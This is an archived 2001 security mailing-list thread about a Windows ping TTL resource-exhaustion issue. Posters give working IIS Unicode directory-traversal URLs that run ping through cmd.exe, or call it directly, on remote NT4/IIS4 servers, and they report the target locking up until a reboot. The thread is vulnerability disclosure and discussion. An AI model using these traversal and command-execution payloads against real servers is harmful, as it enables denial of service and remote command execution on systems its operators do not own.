Vulnerability Development mailing list archives
Re: ping -i (TTL) Vulnerability
From: Reddog Hummer <reddog_33 () HOTMAIL COM>
Date: Thu, 22 Feb 2001 07:43:42 -0000
even better. http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0 this works when cmd is disabled red
From: Reverend Lola <reverend_lola () YAHOO COM> Reply-To: Reverend Lola <reverend_lola () YAHOO COM> To: VULN-DEV () SECURITYFOCUS COM Subject: Re: ping -i (TTL) Vulnerability Date: Wed, 21 Feb 2001 15:34:49 -0800 MIME-Version: 1.0 Received: from [66.38.151.7] by hotmail.com (3.2) with ESMTP id MHotMailBC5DF34C0029400431CE42269707B2660; Wed Feb 21 21:49:23 2001 Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.7])by lists.securityfocus.com (Postfix) with ESMTPid 9DB7C24C599; Wed, 21 Feb 2001 22:35:21 -0700 (MST) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 26713100 for VULN-DEV () LISTS SECURITYFOCUS COM; Wed, 21 Feb 2001 22:35:08 -0700 Received: from securityfocus.com (mail.securityfocus.com [66.38.151.9]) by lists.securityfocus.com (Postfix) with SMTP id D634224D955 for <vuln-dev () lists securityfocus com>; Wed, 21 Feb 2001 16:31:36 -0700 (MST) Received: (qmail 23457 invoked by alias); 21 Feb 2001 23:31:50 -0000 Received: (qmail 23453 invoked from network); 21 Feb 2001 23:31:49 -0000 Received: from web12805.mail.yahoo.com (216.136.174.40) by mail.securityfocus.com with SMTP; 21 Feb 2001 23:31:49 -0000 Received: from [206.204.107.217] by web12805.mail.yahoo.com; Wed, 21 Feb 2001 15:34:49 PST From owner-vuln-dev () SECURITYFOCUS COM Wed Feb 21 21:51:16 2001 Approved-By: BlueBoar () THIEVCO COM Delivered-To: vuln-dev () lists securityfocus com Delivered-To: VULN-DEV () SECURITYFOCUS COM Message-ID: <20010221233449.3741.qmail () web12805 mail yahoo com> Sender: VULN-DEV List <VULN-DEV () SECURITYFOCUS COM> >-----Original Message----- >From: Damian Menscher [mailto:menscher () UIUC EDU] >Sent: Wednesday, February 21, 2001 12:20 PM >To: VULN-DEV () SECURITYFOCUS COM >Subject: Re: ping -i (TTL) Vulnerability %<-----SNIP----->% >No doubt that this would do absolutely nothing from a remote location. %<-----SNIP----->% Actually, it does. I used the Unicode bug to send the command to a remote server (NT 4, SP6a, IIS4): http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0 CPU usage on the target server went to 100%, and stayed there. Task Manager showed ping.exe was using a HUGE amount of system resources (this increased memory usage by a bit as well). I tried to stop ping.exe, and could not. Since ping.exe was started by IIS, I then tried to stop the web server, but it was not responding either. The only way to stop it was to reboot. I'm sure the script kiddies will have fun with this one. :) __________________________________________________ Do You Yahoo!? Yahoo! Auctions - Buy the things you want at great prices! http://auctions.yahoo.com/
_________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Current thread:
- Re: ping -i (TTL) Vulnerability, (continued)
- Re: ping -i (TTL) Vulnerability Jason Witty (Feb 21)
- Re: ping -i (TTL) Vulnerability Weiss, Bill (Feb 21)
- Re: ping -i (TTL) Vulnerability erasor (Feb 21)
- Re: ping -i (TTL) Vulnerability Knud Erik Højgaard - CyberCity Support (Feb 22)
- Re: ping -i (TTL) Vulnerability Jeff Oliver (Feb 21)
- Re: ping -i (TTL) Vulnerability Niels Vaes (Feb 21)
- Re: ping -i (TTL) Vulnerability Mark Villanova (Feb 21)
- Re: ping -i (TTL) Vulnerability Leo R. Lundgren (Feb 21)
- Re: ping -i (TTL) Vulnerability Reverend Lola (Feb 21)
- Re: ping -i (TTL) Vulnerability rpc (Feb 22)
- Re: ping -i (TTL) Vulnerability Reddog Hummer (Feb 22)
- Re: ping -i (TTL) Vulnerability -No Strezzz Cazzz (Feb 22)